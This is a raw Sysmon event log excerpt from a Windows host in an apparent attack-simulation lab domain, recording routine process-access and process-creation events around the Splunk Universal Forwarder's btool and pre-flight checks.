13:36:38.359{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003934Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.359{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE6-6005-CD00-00000000A301}4832C:\Program 
Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003933Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.359{59A5CD1D-8EE6-6005-CC00-00000000A301}47924836C:\Windows\system32\cmd.exe{59A5CD1D-8EE6-6005-CD00-00000000A301}4832C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003932Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.369{59A5CD1D-8EE6-6005-CD00-00000000A301}4832C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8EE6-6005-CC00-00000000A301}4792C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-log 10341000x80000000000000003931Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.359{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE6-6005-CC00-00000000A301}4792C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003930Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.359{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003929Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.359{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003928Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.359{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003927Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.359{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003926Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.359{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003925Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.359{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003924Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.359{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003923Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.359{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003922Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.359{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003921Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.359{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EE6-6005-CC00-00000000A301}4792C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003920Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.359{59A5CD1D-8EE4-6005-C200-00000000A301}24882604C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8EE6-6005-CC00-00000000A301}4792C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18274|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003919Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.364{59A5CD1D-8EE6-6005-CC00-00000000A301}4792C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EE4-6005-C200-00000000A301}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 
10341000x80000000000000003918Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.280{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8EE6-6005-CB00-00000000A301}4808C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003917Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.280{59A5CD1D-8EE6-6005-CB00-00000000A301}48084820C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+116e675|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f344c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003916Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.046{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE6-6005-CB00-00000000A301}4808C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003915Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.046{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003914Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.046{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003913Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.046{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003912Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.046{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003911Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.046{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003910Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.046{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003909Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.030{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003908Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
